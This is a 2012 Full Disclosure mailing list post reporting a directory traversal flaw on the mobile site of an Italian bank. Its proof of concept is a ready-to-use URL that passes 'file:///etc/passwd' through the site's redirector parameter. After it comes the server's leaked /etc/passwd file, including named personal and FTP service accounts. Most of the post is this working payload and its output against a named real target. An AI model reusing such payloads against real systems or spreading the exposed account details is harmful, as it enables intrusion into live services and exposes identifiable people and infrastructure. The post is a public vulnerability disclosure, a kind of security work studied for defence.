Full Disclosure mailing list archives
m.bnl.it Vulnerable to Directory traversal
From: tig3rhack () tormail org
Date: Mon, 10 Sep 2012 23:41:51 -0000
The site m.bnl.it mobile version of the site bnl.it owned by an Italian bank, is vulnerable to a bug type Directory traversal, which would allow an attacker to gain information on the server. POC: http://m.bnl.it/cam/bnl/redirector?&xrexurl=file%3a%2f%2f%2f/etc/passwd >source page root:x:0:0::/root:/bin/tcsh bin:x:1:1:bin:/bin:/bin/false daemon:x:2:2:daemon:/sbin:/bin/false adm:x:3:4:adm:/var/log:/bin/false lp:x:4:7:lp:/var/spool/lpd:/bin/false sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/:/bin/false news:x:9:13:news:/usr/lib/news:/bin/false uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games:/bin/false ftp:x:14:50::/home/ftp:/bin/false smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/:/bin/false gdm:x:42:42:GDM:/var/state/gdm:/bin/bash oprofile:x:51:51:oprofile:/:/bin/false apache:x:80:80:User for Apache:/srv/httpd:/bin/false messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false pop:x:90:90:POP:/:/bin/false nobody:x:99:99:nobody:/:/bin/false crosia_p:x:1000:100:CROSIA Patrick,SYNTEN,,:/home/crosia_p:/bin/tcsh wokup:x:1001:102:WOKUP,,,:/opt/tomcat:/bin/bash mfortis:x:1002:100:Ftp Account (MFORTIS.SYNTEN.COM),,,:/home/www/mfortis:/bin/false mfortis-content:x:1003:100:Ftp Account (MFORTIS-CONTENT.SYNTEN.COM),,,:/home/www/mfortis-content:/bin/false mqafortis:x:1004:100:Ftp Account (MQAFORTIS.SYNTEN.COM),,,:/home/www/mqafortis:/bin/false mqafortis-content:x:1005:100:Ftp Account (MQAFORTIS-CONTENT.SYNTEN.COM),,,:/home/www/mqafortis-content:/bin/false mqafortis-dev:x:1006:100:Ftp Account (MQAFORTIS-DEV.SYNTEN.COM),,,:/home/www/mqafortis-dev:/bin/false mbnl:x:1007:100:Ftp Account (MBNL.SYNTEN.COM),,,:/home/www/mbnl:/bin/false mbnl-content:x:1008:100:Ftp Account (MBNL-CONTENT.SYNTEN.COM),,,:/home/www/mbnl-content:/bin/false mqabnl:x:1009:100:Ftp Account (MQABNL.SYNTEN.COM),,,:/home/www/mqabnl:/bin/false mqabnl-content:x:1010:100:Ftp Account (MQABNL-CONTENT.SYNTEN.COM),,,:/home/www/mqabnl-content:/bin/fals It should be noted that the admin security is not a optional Share this: _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- m.bnl.it Vulnerable to Directory traversal tig3rhack (Sep 11)